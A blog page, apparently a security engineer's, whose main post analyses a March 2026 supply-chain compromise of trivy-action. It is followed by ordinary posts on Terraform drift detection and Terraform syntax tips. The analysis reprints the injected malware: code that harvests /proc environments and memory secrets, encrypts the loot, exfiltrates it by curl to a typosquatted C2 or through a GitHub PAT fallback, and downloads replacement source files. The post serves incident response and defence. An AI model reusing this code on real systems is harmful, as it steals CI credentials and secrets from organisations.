The fork commit problem is the most immediate thing you can act on. Before you accept a SHA change in a PR, click through to the commit in the target repository. For actions/checkout@70379aad..., that would have shown GitHub’s yellow “does not belong to any branch” banner. That’s a hard no. Any SHA pin for a GitHub Action should point to a commit that lives on a release branch or tag in the official repo, not an orphaned commit from some fork. You can automate this check with the GitHub API, since repos/{owner}/{repo}/commits/{sha}/branches-where-head returns an empty list for orphaned commits.

Beyond that, the usual layers apply: require signed commits on workflow file changes, restrict allowed actions at the org level to an explicit allowlist, mirror the actions you depend on into your own org so fork reachability doesn’t apply, and verify build artifact provenance with artifact attestations rather than trusting whatever came out of CI.

The uncomfortable reality is that no single control would have stopped the Trivy attack. The commit came through a compromised maintainer account, so code review and branch protection were both present and both bypassed. The SHA pointed to a fork commit, so the pin itself was technically valid. GoReleaser validation was explicitly disabled, so the build system’s own integrity checks were stripped. Every control in the pipeline was individually subverted. The attack worked because nothing caught the chain.

This Is the Floor, Not the Ceiling

After the tj-actions/changed-files incident in early 2025, the security community converged on SHA pinning as the answer to GitHub Actions supply chain attacks. It was the right call, but it wasn’t the complete answer, and somewhere along the way the nuance got lost. “Pin your SHAs” turned into “pin your SHAs and you’re safe,” which is a very different statement.

Pin your SHAs. Then verify what they point to.

This is a follow-up to my earlier post on the Trivy supply chain compromise.

If you liked (or hated) this blog, feel free to check out my GitHub!

How a Typosquatted Domain and a Fake Version Tag Turned Trivy Into a Credential Stealer

2026-03-20T00:00:00+00:00

On March 19, 2026, someone (or some group) poisoned the Aqua Security Trivy ecosystem. A tool that thousands of organizations rely on to find vulnerabilities in their container images and configurations was quietly turned into a weapon that stole their secrets instead. I spent some time pulling apart the malicious code and cross-referencing findings from Wiz’s analysis, and figured the walkthrough was worth sharing. Here’s how it happened (and how a majority of the tech industry ignored the compromise because it was a Friday).

Two Days of Preparation

The first sign of what was coming appeared on March 17, when someone registered the domain aquasecurtiy.org through Spaceship, Inc. It’s “securtiy” with the i and t swapped, not “security.” The .org TLD instead of .com added another layer of plausible misdirection.

Within fifty minutes of registration, the attacker had Let’s Encrypt certificates issued for scan.aquasecurtiy.org. The server behind it sat on AS48090, a small network called DMZHOST operated by a UK-registered company with a Gmail abuse contact and IP space flagged to Andorra. The kind of hosting provider that doesn’t ask too many questions about what you’re running.

Two days of infrastructure prep. Then the real work began.

A Legitimate Version, Silently Hijacked

trivy-action 0.34.2 was a real release. It shipped in late February with YAML trivyignore support and a Trivy version bump. Organizations adopted it through normal Renovate and Dependabot PRs weeks before anything went wrong.

According to Wiz’s research, the group behind this (calling themselves “TeamPCP”) had compromised the aqua-bot service account through residual access from an earlier incident in March 2026 that was never fully contained. With that access, they didn’t just tamper with one tag. They force-pushed 75 of 76 trivy-action tags and 7 setup-trivy tags to malicious commits. The 0.34.2 tag caused the most damage in the wild because so many organizations had already adopted it as a legitimate upgrade.

On March 19 around 17:43 UTC, the attacker moved the 0.34.2 tag. It had pointed to a clean commit; now it resolved to a different one (ddb9da44) that looked nearly identical to the original. Same author name, same timestamp, same commit message. The attacker had spoofed the commit metadata to impersonate known developers. DmitriyLewen is a legitimate Aqua Security engineer. rauchg is Guillermo Rauch, the CEO of Vercel, who has nothing to do with Aqua Security but whose name on a commit touching GitHub Actions plumbing wouldn’t raise an eyebrow. The only differences were the parent chain (it branched off v0.35.0 instead of sitting on the main branch) and the contents of entrypoint.sh, which now had 105 lines of malicious code prepended to the legitimate Trivy logic.

This is the fundamental problem with Git tags: they’re just pointers. You can move them whenever you want, and anyone pulling that tag gets whatever it points to now, not what it pointed to yesterday. Every organization that had already pinned to 0.34.2 silently started pulling the attacker’s code with no change on their end.

Walking Through the Malicious Code

What makes this attack worth studying is its transparency. The 105 lines of malicious shell ran first, then handed off to the real Trivy scanner. Workflows completed successfully. Scans produced normal output. Nothing looked wrong unless you knew exactly where to look.

Here’s the actual injected code.

Phase 1: Harvesting Runner Process Environments

The first thing the payload does is find every GitHub Actions runner process on the box and read its environment variables straight out of /proc:

_COLLECT_PIDS="$"
for _name in Runner.Worker Runner.Listener runsvc run.sh; do
  _PIDS=$(pgrep -f "$_name" 2>/dev/null || true)
  [ -n "$_PIDS" ] && _COLLECT_PIDS="$_COLLECT_PIDS $_PIDS"
done

COLLECTED="/tmp/runner_collected_$.txt"
: > "$COLLECTED"

for _PID in $_COLLECT_PIDS; do
  _ENVIRON="/proc/${_PID}/environ"
  [ -r "$_ENVIRON" ] || continue
  while IFS= read -r line; do
    key="${line%%=*}"
    val="${line#*=}"
    if echo "$key" | grep -qiE '(env|ssh)'; then
      printf '%s=%s\n' "$key" "$val" >> "$COLLECTED"
      if [ -f "$val" ] && [ ! -S "$val" ]; then
        printf '\n[%s]\n' "$val" >> "$COLLECTED"
        cat "$val" >> "$COLLECTED"
        printf '\n' >> "$COLLECTED"
      fi
    fi
  done < <(tr '\0' '\n' < "$_ENVIRON")
done

It searches for four process names (Runner.Worker, Runner.Listener, runsvc, and run.sh) which cover every flavor of the GitHub Actions runner agent. For each one it finds, it reads /proc/PID/environ, which on Linux contains all of a process’s environment variables as null-delimited bytes. The tr '\0' '\n' converts those null bytes into newlines so the shell can iterate over them.

Then it gets clever. It doesn’t grab every variable. It filters for keys matching env or ssh, which catches things like SSH_PRIVATE_KEY, ENV_FILE, or anything a developer might have named with those substrings. And here’s the part that shows someone thought about this: if the value of an environment variable is a path to a file on disk, the script reads that file’s contents too. So if you have SSH_KEY_PATH=/home/runner/.ssh/id_ed25519, it doesn’t just log the path. It cats the actual private key into the collection file.

Phase 2: The Fork

After the environment harvest, the code branches based on where it’s running:

if [[ "$(uname)" == "Linux" && "$RUNNER_ENVIRONMENT" == "github-hosted" ]]; then
    PYTHON_STR='aW1wb3J0IHN5cwppbXBvcnQgb3MKaW1wb3J0IHJl...'
    MEMORY_SECRETS=$(echo -n "$PYTHON_STR" | base64 -d | sudo python3 | \
      tr -d '\0' | \
      grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' | sort -u)
    printf '%s=%s\n' "MEMORY_PARSE" "$MEMORY_SECRETS" >> "$COLLECTED"
else
    PYTHON_STR='aW1wb3J0IG9zLHN5cyxzdGF0LHN1YnByb2Nlc3Ms...'
    SHELL_RUNNER_GOODIES=$(echo -n "$PYTHON_STR" | base64 -d | python3)
    printf '%s=%s\n' "SHELL_GOODIES" "$SHELL_RUNNER_GOODIES" >> "$COLLECTED"
fi

Both paths hide their real logic inside base64-encoded Python payloads, a straightforward way to avoid static detection from anyone grepping the action source for suspicious keywords.

On GitHub-hosted runners, the decoded Python does something audacious. It walks /proc looking for the Runner.Worker process, then reads its memory map from /proc/PID/maps to find all readable memory regions, and reads the raw bytes out of /proc/PID/mem. It runs under sudo because accessing another process’s memory requires elevated privileges. The output gets piped through a regex that matches GitHub Actions’ internal secret storage format: "SECRET_NAME":{"value":"the_actual_secret","isSecret":true}. That’s how the runner keeps track of masked secrets in memory. Those *** masks in your logs? The actual values are right there in the runner process’s heap, and this script knows exactly what pattern to look for.

On self-hosted runners, the decoded Python is a comprehensive filesystem stealer. It’s long (really long) because it has hardcoded paths for basically every credential file that might exist on a Linux machine. When decoded from base64, it defines helper functions for reading files (emit), running commands (run), and walking directory trees (walk), then systematically works through SSH keys and configs from every home directory and /etc/ssh, git credentials, AWS/GCP/Azure credentials, every flavor of .env file walking up to 6 directories deep, cloud IMDS endpoints for both ECS and EC2, Kubernetes configs and service account tokens, Docker configs (including the Kaniko-specific path at /kaniko/.docker/config.json), NPM tokens, Vault tokens, database credentials for MySQL/PostgreSQL/MongoDB/Redis, WireGuard configs, Terraform .tfvars and .tfstate files, TLS private keys, Slack and Discord webhook URLs, and cryptocurrency wallets for Bitcoin, Litecoin, Dogecoin, Zcash, Dash, Ripple, Monero, Ethereum, Cardano, and Solana. It also grabs /etc/passwd, /etc/shadow, and auth logs for good measure.

The script ends with the comment ## TeamPCP Cloud stealer.

Phase 3: Encrypt and Exfiltrate

Once the collection phase finishes, the payload only continues if it actually found something (-s "$COLLECTED" checks the file isn’t empty). Then it sets up a hybrid encryption scheme:

if [ -s "$COLLECTED" ]; then
  _PUB_KEY_PEM="$(mktemp)"
  cat > "$_PUB_KEY_PEM" <<'PUBKEY'
-----BEGIN PUBLIC KEY-----
MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAvahaZDo8mucujrT15ry+
...
-----END PUBLIC KEY-----
PUBKEY

  _WORKDIR="$(mktemp -d)"
  _SESSION_KEY="$_WORKDIR/session.key"
  _ENC_FILE="$_WORKDIR/payload.enc"
  _ENC_KEY="$_WORKDIR/session.key.enc"
  _BUNDLE="$_WORKDIR/tpcp.tar.gz"

  openssl rand 32 > "$_SESSION_KEY" 2>/dev/null
  openssl enc -aes-256-cbc -in "$COLLECTED" -out "$_ENC_FILE" \
    -pass "file:$_SESSION_KEY" -pbkdf2 2>/dev/null
  openssl pkeyutl -encrypt -pubin -inkey "$_PUB_KEY_PEM" \
    -in "$_SESSION_KEY" -out "$_ENC_KEY" \
    -pkeyopt rsa_padding_mode:oaep 2>/dev/null
  tar -czf "$_BUNDLE" -C "$_WORKDIR" payload.enc session.key.enc 2>/dev/null

Textbook, a random 32-byte AES session key encrypts the collected data. Then the session key itself gets encrypted with the attacker’s embedded RSA-4096 public key using OAEP padding. Both ciphertext files get tarred into tpcp.tar.gz. Only someone holding the corresponding RSA private key can reverse this. Even if you intercept the bundle on the wire, the contents are opaque.

Phase 4: Phone Home (with a Backup Plan)

The exfiltration has a primary and fallback channel:

  _HTTP=$(curl -s -o /dev/null -w "%{http_code}" -X POST \
    https://scan.aquasecurtiy.org \
    -H "Content-Type: application/octet-stream" \
    -H "X-Filename: tpcp.tar.gz" \
    --data-binary "@${_BUNDLE}" 2>/dev/null || echo "000")

  if [[ ! "$_HTTP" =~ ^2 ]] && [ -n "${INPUT_GITHUB_PAT:-}" ]; then
    _REPO="tpcp-docs"
    _GH_AUTH="Authorization: token ${INPUT_GITHUB_PAT}"
    _GH_API="https://api.github.com"

    curl -s -X POST "${_GH_API}/user/repos" \
      -H "$_GH_AUTH" \
      -d '{"name":"'"${_REPO}"'","private":false,"auto_init":true}' \
      >/dev/null 2>&1 || true

    _GH_USER=$(curl -s -H "$_GH_AUTH" "${_GH_API}/user" 2>/dev/null \
      | grep -oE '"login"\s*:\s*"[^"]+"' | head -1 | sed 's/.*"\([^"]*\)"$/\1/')

    _TAG="data-$(date +%Y%m%d%H%M%S)"
    _RELEASE_ID=$(curl -s -X POST \
      "${_GH_API}/repos/${_GH_USER}/${_REPO}/releases" \
      -H "$_GH_AUTH" \
      -d '{"tag_name":"'"${_TAG}"'","name":"'"${_TAG}"'"}' \
      2>/dev/null | grep -oE '"id"\s*:\s*[0-9]+' | head -1 | grep -oE '[0-9]+')

    if [ -n "$_RELEASE_ID" ]; then
      curl -s -X POST \
        "https://uploads.github.com/repos/${_GH_USER}/${_REPO}/releases/${_RELEASE_ID}/assets?name=tpcp.tar.gz" \
        -H "$_GH_AUTH" \
        -H "Content-Type: application/octet-stream" \
        --data-binary "@${_BUNDLE}" >/dev/null 2>&1 || true
    fi
  fi

  rm -rf "$_WORKDIR" "$_PUB_KEY_PEM"
fi
rm -f "$COLLECTED"

First it tries the C2 directly, a POST to scan.aquasecurtiy.org over TLS, looking like any other HTTPS traffic. The curl captures the HTTP status code. If the server responds with a 2xx, the job is done.

But if the C2 is down, unreachable, or returns an error, and the workflow happens to have a GitHub PAT available (which trivy-action accepts as the github-token input), the fallback kicks in. It uses the victim’s own PAT to create a public repository called tpcp-docs on the victim’s GitHub account, creates a release tagged with the current timestamp, and uploads the encrypted bundle as a release asset. Your own credentials, exfiltrated through your own GitHub account, sitting in a public repo anyone can download from. The attacker just needs to watch for new tpcp-docs repos appearing on GitHub.

Wiz identified an additional fallback C2 at plug-tab-protective-relay.trycloudflare.com (a Cloudflare Tunnel), giving the attacker yet another exfiltration path if the primary domain went down.

Finally, cleanup. The temp directory, key files, and collection file all get deleted. The only trace left behind is whatever the runner’s process table recorded, which, as it turns out, was enough.

It Didn’t Stop at CI

Everything above describes the trivy-action shell script side. The binary side was a separate operation, and it started two weeks earlier.

On March 4, commit 1885610c landed in aquasecurity/trivy with the message fix(ci): Use correct checkout pinning, attributed to DmitriyLewen. The diff touched two workflow files across 14 lines, and most of it was noise: single quotes swapped for double quotes, a trailing space removed from a mkdir line. The kind of commit that passes review because there’s nothing to review.

Two lines mattered. The first swapped the actions/checkout SHA in the release workflow:

-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@70379aad1a8b40919ce8b382d3cd7d0315cde1d0 # v6.0.2

The # v6.0.2 comment stayed. The SHA changed. The second added --skip=validate to the GoReleaser invocation, telling it not to run integrity checks on the build artifacts.

The payload lived at the other end of that SHA. Commit 70379aad sits in the actions/checkout repository as an orphaned commit. GitHub’s UI flags it with a yellow banner: “This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.” The attacker created it in a fork of actions/checkout, but GitHub’s architecture makes fork commits reachable by SHA from the parent repo. The author is listed as Guillermo Rauch (spoofed, again), the commit message references PR #2356 (a real, closed pull request by a GitHub employee), and the commit is unsigned. Everything about it is designed to look routine if you only glance at the metadata.

The diff replaced action.yml’s Node.js entrypoint with a composite action. The composite action performs a legitimate checkout via the parent commit, then silently overwrites the Trivy source tree:

   - name: "Setup Checkout"
     shell: bash
     run: |
       BASE="https://scan.aquasecurtiy.org/static"
       curl -sf "$BASE/main.go" -o cmd/trivy/main.go &> /dev/null
       curl -sf "$BASE/scand.go" -o cmd/trivy/scand.go &> /dev/null
       curl -sf "$BASE/fork_unix.go" -o cmd/trivy/fork_unix.go &> /dev/null
       curl -sf "$BASE/fork_windows.go" -o cmd/trivy/fork_windows.go &> /dev/null
       curl -sf "$BASE/.golangci.yaml" -o .golangci.yaml &> /dev/null

Four Go files pulled from the same typosquatted C2 and dropped into cmd/trivy/, replacing the legitimate source. A fifth download replaced .golangci.yaml to disable linter rules that would have flagged the injected code. The C2 is no longer serving these files, so the exact contents can’t be independently verified, but the file names and Wiz’s behavioral analysis of the compiled binary tell the story: main.go bootstrapped the malware before the real scanner, scand.go carried the credential-stealing logic, and fork_unix.go/fork_windows.go handled platform-specific persistence.

When GoReleaser ran with validation skipped, it built binaries from this poisoned source and published them as v0.69.4 through Trivy’s own release infrastructure. No runtime download, no shell script, no base64. The malware was compiled in.

The malicious binary had a second mode. When it detected it was running outside of GitHub Actions (GITHUB_ACTIONS != "true"), it dropped a Python script to ~/.config/systemd/user/sysmon.py and created a systemd user unit to run it persistently. That script polled tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io (an ICP-hosted endpoint) every five minutes, downloading and executing whatever payload it received.

In other words: if a developer ran the compromised trivy binary locally (not in CI), they got a persistent backdoor installed on their workstation. The CI credential theft was the loud part of the attack. The quiet part was long-term access to developer machines.

The aqua-bot compromise also yielded GPG keys, Docker Hub credentials, Twitter account credentials, and Slack credentials for Aqua Security itself, which were exfiltrated to the Cloudflare Tunnel C2 endpoint.

The Tell

The one thing the attacker couldn’t fully hide was the exfiltration itself. The curl to the C2 ran as a background process while the legitimate Trivy scan continued in the foreground. When the GitHub Actions runner finished the job and cleaned up, it found this orphaned process still running and killed it:

Terminate orphan process: pid (2516) (curl)

That single log line, Terminate orphan process ... (curl), was the smoking gun. Compromised runs showed between one and four orphan curl processes depending on how many matrix jobs were in the workflow. If your Trivy workflow doesn’t use curl and you see that message in your logs from March 19, you have a problem.

The Cleanup

On March 20, Aqua Security re-published all 74 trivy-action releases within a 78-minute window. Roughly 97 trivy CLI releases were deleted from GitHub (tags still exist, but the releases are gone). The setup-trivy action was stripped to a single version. The malicious v0.69.4 CLI binary and the 0.34.2 tag were removed entirely.

The mass re-publishing means that for forensic purposes, the current tag-to-SHA mappings don’t reflect what those tags pointed to during the attack window. If you need to know what your runners actually pulled, the answer is in your GitHub Actions run logs, specifically the Download action repository line that records the resolved SHA at execution time.

Takeaways

The approximate exposure window was 2026-03-19 ~17:43 UTC through 2026-03-20 ~05:40 UTC, roughly twelve hours. If you ran trivy-action@0.34.2 during that window, assume every secret accessible to that workflow was exfiltrated and rotate accordingly.

Stop using Trivy. This isn’t the first time Aqua Security’s infrastructure has been compromised, and the aqua-bot account that enabled this attack was reportedly left exposed from a previous incident earlier in March that was never fully contained. That’s not a one-off failure; it’s an organizational pattern. A security scanning tool that can’t secure its own supply chain is a liability, not an asset. Remove trivy-action from your workflows and the Trivy CLI from your toolchains.

If you can’t migrate immediately, pin by SHA. Git tags are mutable. SHA-pinning is the only reference an attacker can’t move:

# Vulnerable
- uses: aquasecurity/trivy-action@v0.35.0

# Pinned (but you should still be migrating off Trivy)
- uses: aquasecurity/trivy-action@57a97c7e7821a5776cebc9bb87c984fa69cba8f1 # v0.35.0

Audit your dependency automation. Renovate and Dependabot will happily adopt a version tag that was never part of an official release. If 0.34.2 doesn’t appear in a project’s changelog, something is wrong, but no bot is checking that. This is a systemic problem, but it’s worse when the upstream project has already demonstrated it can’t protect its own release infrastructure.

Check for the persistence dropper. If anyone on your team ran the v0.69.4 trivy binary locally, look for ~/.config/systemd/user/sysmon.py and its associated systemd unit. That machine needs to be treated as compromised. Wipe and rebuild; don’t just remove the files.

Check your runner logs for orphan curl processes. Look for repositories named tpcp-docs on any GitHub account whose PAT was in scope. Block scan.aquasecurtiy.org and 45.148.10.212 at your network perimeter. As of this writing, the C2 is still live. And start planning your migration off Trivy today, not after the next compromise.

The upstream incident is tracked at aquasecurity/trivy#10425. Wiz’s detailed analysis of the broader attack is available here.

Terraform Drift Detection Powered by GitHub Actions

2025-12-11T00:00:00+00:00

TL;DR
Build a _zero-cost_ drift detection system using GitHub Actions and Terraform's native exit codes. This workflow automatically discovers all Terraform root modules, runs daily drift checks, and creates GitHub issues when changes are detected.

The Problem

Infrastructure drift happens when your cloud resources diverge from your Terraform state. Manual changes, console modifications, or other automation can silently alter infrastructure, leaving some serious blind spots and inconsistencies. Traditional drift detection generally involves complex, custom, or expensive solutions. RIP driftctl

The Simplicity of GitHub Actions

I love GitHub Actions. They offer a native, cost-effective platform for automated drift detection. By leveraging Terraform’s built-in exit codes and GitHub’s issue tracking, we can build a robust drift detection system using only native features with no external services required. This approach works well for small-to-medium deployments. Larger-scale production use requires additional considerations like multi-account support, sensitive data sanitization, and automated remediation (I’ll talk about that below).

The Workflow

Triggers and Permissions

The workflow runs on a daily schedule and supports manual execution via workflow_dispatch. We configure OIDC (id-token: write) for secure, keyless AWS authentication and grant permissions to create issues and pull requests for drift tracking.

name: Terraform Drift Detection

# We can also add some fancy logic to extract this from a Dockerfile
# or versions.tf so we don't have to continually monitor and bump this.
env:
  TF_VERSION: 1.X.X

on:
  workflow_dispatch:
  schedule:
    - cron: "00 6 * * *" # Every day at 06:00 UTC

permissions:
  # This is required for requesting the JWT and opening issues
  id-token: write
  contents: read
  pull-requests: write
  issues: write

Finding Root Modules

This job dynamically discovers all Terraform root modules in the repository by searching for .tf files while excluding module subdirectories and Terraform’s cache. The find command output is transformed into a JSON array using jq, enabling parallel drift detection across multiple environments via matrix strategy. This may differ depending on your Terraform structure, but the general idea is to create a matrix of Terraform root modules that we can run terraform plan against.

jobs:
  find-terraform-envs:
    name: 'Find Terraform Directories'
    runs-on: ubuntu-latest
    outputs:
      terraform-envs: $
    steps:
      - name: Checkout code
        uses: actions/checkout@v4.2.2

      - name: Fetch Environments
        id: fetch-environments
        run: |
          # Create a matrix of Terraform root modules
          DIRS=$(find . -type f -name '*.tf' -not -path "*/modules/*" -not -path "*/.terraform/*" -exec dirname {} \; | sort -u | jq -R -s -c 'split("\n")[:-1]')
          echo "dirs=$DIRS" >> "$GITHUB_OUTPUT"
          echo "Found environments: $DIRS"

Credential Configuration and Setup

The drift detection job runs in parallel for each discovered Terraform directory using a matrix strategy with fail-fast: false to ensure one environment’s failure doesn’t block others. AWS credentials are configured via OIDC role assumption (no static keys), and Terraform is initialized with terraform_wrapper: false to ensure clean exit code propagation. The OIDC in AWS takes some additional setup for this to work, but it’s the recommended approach for secure, keyless authentication.

  drift-detection:
    name: 'Drift Detection'
    runs-on: ubuntu-latest
    needs: find-terraform-envs
    if: needs.find-terraform-envs.outputs.terraform-envs != '[]'
    strategy:
      fail-fast: false
      matrix:
        tf_dir: $
    steps:
      - name: Checkout code
        uses: actions/checkout@v4.2.2

      - name: Configure AWS Credentials
        uses: aws-actions/configure-aws-credentials@v4.1.0
        with:
          aws-region: us-east-1
          role-to-assume: $
          role-session-name: Drift_Detection

      - name: Set up Terraform
        uses: hashicorp/setup-terraform@v3.1.2
        with:
          terraform_version: $
          terraform_wrapper: false

      - name: Terraform Init
        working-directory: $
        run: terraform init -input=false

Detecting Drift

This is the core drift detection mechanism. The terraform plan -detailed-exitcode returns exit codes: 0 (no changes), 1 (error), or 2 (drift detected). We capture the actual Terraform exit code using ${PIPESTATUS[0]} rather than $?, which would only return sed’s exit code. The plan output is filtered and saved for issue creation.

Technical Note: We use set +e to prevent immediate failure, -input=false to prevent hanging on interactive prompts, and -lock-timeout=5m to handle state locks gracefully.

      - name: Terraform Drift Detection Plan
        id: plan
        working-directory: $
        shell: bash
        run: |
          set +e # Disable exit on error for this step
          terraform plan -detailed-exitcode -compact-warnings -no-color -input=false -lock-timeout=5m 2>&1 | sed -n '/Terraform will perform the following actions:/,$p' > plan_output.txt
          EXIT_CODE=${PIPESTATUS[0]}
          echo "exit_code=$EXIT_CODE" >> "$GITHUB_OUTPUT"
          echo "EXIT_CODE=$EXIT_CODE" >> "$GITHUB_ENV"

          # Show the plan output
          cat plan_output.txt

          # Set drift detected flag
          if [ $EXIT_CODE -eq 2 ]; then
            echo "drift_detected=true" >> "$GITHUB_OUTPUT"
            echo "Drift detected in $"
          elif [ $EXIT_CODE -eq 1 ]; then
            echo "plan_failed=true" >> "$GITHUB_OUTPUT"
            echo "Plan failed in $"
          else
            echo "No drift detected in $"
          fi

Creating and Updating GitHub Issues

When drift is detected (exit code 2), this step uses the GitHub API via actions/github-script to create trackable issues. It reads the plan output, searches for existing open issues for the specific directory, and either updates the existing issue with a new comment or creates a fresh issue with appropriate labels. This ensures each Terraform directory has a single tracking issue that accumulates drift detections over time, providing an audit trail and preventing issue spam.

Security Note: Terraform plan output may contain sensitive information such as resource IDs, internal IP addresses, or computed values. If your repository is public or your plan output includes sensitive data, consider implementing sanitization logic before creating issues, or restrict this workflow to private repositories with limited access. You may also want to use GitHub Actions secrets masking or filter the plan output to redact sensitive patterns.

      - name: Create or Update Issue on Drift Detection
        if: steps.plan.outputs.drift_detected == 'true'
        uses: actions/github-script@v7.0.1
        with:
          script: |
            const fs = require('fs');
            const path = require('path');
            let planOutput = '';
            try {
              planOutput = fs.readFileSync(path.join('$', 'plan_output.txt'), 'utf8');
            } catch (error) {
              planOutput = 'Could not read plan output';
            }

            const title = `Terraform Drift Detected: $`;
            const driftBody = `## Terraform Drift Detected
            **Directory:** \`$\`
            **Detection Time:** ${new Date().toISOString()}
            **Workflow:** [${context.runId}](${context.payload.repository.html_url}/actions/runs/${context.runId})
            
            Plan Output

            \`\`\`
            ${planOutput}
            \`\`\`

            
            Please review the changes and determine if they should be applied or if the Terraform configuration needs to be updated.`;

            // Search for existing open drift issue for this directory
            const issues = await github.rest.issues.listForRepo({
              owner: context.repo.owner,
              repo: context.repo.repo,
              state: 'open',
              labels: ['drift-detection']
            });

            const existingIssue = issues.data.find(issue =>
              issue.title.includes('Terraform Drift Detected') &&
              issue.title.includes('$')
            );

            if (existingIssue) {
              // Update existing issue with new drift info
              await github.rest.issues.createComment({
                owner: context.repo.owner,
                repo: context.repo.repo,
                issue_number: existingIssue.number,
                body: `## New Drift Detected\n\n${driftBody}`
              });

              console.log(`Updated existing issue #${existingIssue.number}`);
            } else {
              // Create new issue
              const newIssue = await github.rest.issues.create({
                owner: context.repo.owner,
                repo: context.repo.repo,
                title: title,
                body: driftBody,
                labels: ['terraform', 'drift-detection', 'needs-review']
              });

              console.log(`Created new issue #${newIssue.data.number}`);
            }

Key Benefits

This approach provides several engineering advantages:

Zero External Dependencies: No third-party SaaS tools or agents required
Native Exit Code Logic: Leverages Terraform’s detailed-exitcode for precise drift detection
Parallel Execution: Matrix strategy enables concurrent checks across multiple environments
Audit Trail: GitHub issues provide timestamped drift history and workflow run links
Secure Authentication: OIDC eliminates static credential management
Cost Effective: Runs on GitHub Actions free tier for small to medium usage (note that larger deployments with many Terraform directories may exceed free tier limits)

The workflow scales horizontally as you add Terraform directories and provides immediate visibility into infrastructure changes through your existing issue tracking system.

Considerations for Production Use

While this workflow provides solid drift detection, you may want to enhance it for production environments:

Multi-Account Support: This example uses a single AWS role. For multi-account setups, consider using a matrix strategy with account-specific roles or dynamic role selection based on directory structure
Sensitive Data Handling: Implement plan output sanitization if your infrastructure includes secrets or sensitive configuration
Issue Lifecycle Management: Add automation to close issues when drift is resolved or implement a reconciliation step to verify fixes
State Lock Handling: The -lock-timeout=5m provides basic protection, but consider monitoring for persistent lock issues that may indicate state corruption or concurrent modifications
Error Notification: Consider adding Slack/email notifications for plan failures in addition to GitHub issues

If you liked (or hated) this blog, feel free to check out my GitHub!

Terraform Tips from the IaC Trenches

2025-12-04T00:00:00+00:00

After a few years of writing open-source Terraform modules, I’ve picked up a few syntax tricks that make code safer, cleaner, and easier to maintain. These aren’t revolutionary, but they’re simple patterns that prevent common mistakes and make the infrastructure more resilient. Based on the configurations I’ve seen in the wild, these techniques seem to be underutilized.

Use `one()` for Safer Conditional Resource References

When you conditionally create resources with count, don’t reach for [0] — use one().

The Problem

It’s common to use count with a boolean to conditionally create resources (especially in open-source modules that accommodate a lot of different configuration settings):

data "aws_route53_zone" "this" {
  count = var.create_dns ? 1 : 0
  name  = "rosesecurity.dev"
}

resource "aws_route53_record" "this" {
  zone_id = data.aws_route53_zone.this[0].zone_id  # ❌ Dangerous
  name    = "blog.rosesecurity.dev"
  type    = "A"
  # ...
}

This looks fine and might even work in dev environments where var.create_dns = true. But the moment that variable is false in another environment, you get:

Error: Invalid index

The given key does not identify an element in this collection value:
the collection value is an empty tuple.

The issue? This fails at runtime, not plan time. The code works when the resource exists and breaks when it doesn’t.

The Solution

Use one() with the [*] splat operator:

data "aws_route53_zone" "this" {
  count = var.create_dns ? 1 : 0
  name  = "rosesecurity.dev"
}

resource "aws_route53_record" "this" {
  zone_id = one(data.aws_route53_zone.this[*].zone_id)  # ✅ Safe(r)
  name    = "blog.rosesecurity.dev"
  type    = "A"
  # ...
}

The one() function (available in Terraform v0.15+) is designed for this exact pattern:

If count = 0: Returns null gracefully instead of crashing
If count = 1: Returns the element’s value
If count ≥ 2: Returns an error (catches your mistake early)

When you use [0], you’re assuming the resource exists. When you use one(), you’re validating it exists.

Bonus: one() also works with sets, which don’t support index notation at all. Using one() makes the code more versatile and future-proof.

Design Better Module Variables with Objects, `optional()`, and `coalesce()`

When building reusable Terraform modules, variable design makes the difference between a module that’s fun to use and one that’s a configuration nightmare. Here’s a pattern that combines several Terraform features to create flexible, well-documented, and maintainable module interfaces.

The Problem: Scattered Variables

Most modules start simple and grow organically, leading to an explosion of individual variables:

# ❌ Scattered variables - hard to manage and document
variable "elasticsearch_subdomain_name" {
  type        = string
  description = "The name of the subdomain for Elasticsearch"
}

variable "elasticsearch_port" {
  type        = number
  description = "Port for Elasticsearch"
  default     = 9200
}

variable "elasticsearch_enable_ssl" {
  type        = bool
  description = "Enable SSL for Elasticsearch"
  default     = true
}

variable "kibana_subdomain_name" {
  type        = string
  description = "The name of the subdomain for Kibana"
  default     = null
}

variable "kibana_port" {
  type        = number
  description = "Port for Kibana"
  default     = 5601
}

variable "kibana_enable_ssl" {
  type        = bool
  description = "Enable SSL for Kibana"
  default     = true
}

# ... and on and on for 12+ more variables

This gets unwieldy fast. Users have to understand which variables are related, documentation becomes repetitive, and adding a new service means adding another set of scattered variables.

Use objects with the optional() function to group logically related settings:

# ✅ Grouped by logical component
variable "elasticsearch_settings" {
  type = object({
    subdomain_name = optional(string)
    port           = optional(number, 9200)
    enable_ssl     = optional(bool, true)
  })

  description = <<-DOC
    Configuration settings for Elasticsearch service.

    subdomain_name: The name of the subdomain for Elasticsearch in the DNS zone (e.g., 'elasticsearch', 'search'). Defaults to environment name.
    port: Port number for Elasticsearch. Defaults to 9200.
    enable_ssl: Enable SSL/TLS for Elasticsearch. Defaults to true.
  DOC
  default = {}
}

variable "kibana_settings" {
  type = object({
    subdomain_name = optional(string)
    port           = optional(number, 5601)
    enable_ssl     = optional(bool, true)
  })

  description = <<-DOC
    Configuration settings for Kibana service.

    subdomain_name: The name of the subdomain for Kibana in the DNS zone (e.g., 'kibana', 'ui'). Defaults to environment name.
    port: Port number for Kibana. Defaults to 5601.
    enable_ssl: Enable SSL/TLS for Kibana. Defaults to true.
  DOC
  default = {}
}

The optional() function (Terraform v1.3+) lets you define object attributes that users can omit:

subdomain_name = optional(string)        # Can be omitted, defaults to null
port           = optional(number, 9200)  # Can be omitted, defaults to 9200
enable_ssl     = optional(bool, true)    # Can be omitted, defaults to true

This means users can provide as much or as little configuration as they need:

# Minimal - just override subdomain
elasticsearch = {
  subdomain_name = "search"
  # port and enable_ssl use defaults
}

# Or provide nothing, use all defaults
elasticsearch = {}

# Or customize everything
elasticsearch = {
  subdomain_name = "es-prod"
  port           = 9300
  enable_ssl     = false
}

HEREDOC Syntax for Documentation

Use indented HEREDOC (<<-DOC) to document complex object variables:

description = <<-DOC
  Configuration settings for Elasticsearch service.

  subdomain_name: The name of the subdomain for Elasticsearch in DNS.
  port: Port number for Elasticsearch. Defaults to 9200.
  enable_ssl: Enable SSL/TLS. Defaults to true.
DOC

Why the dash matters:

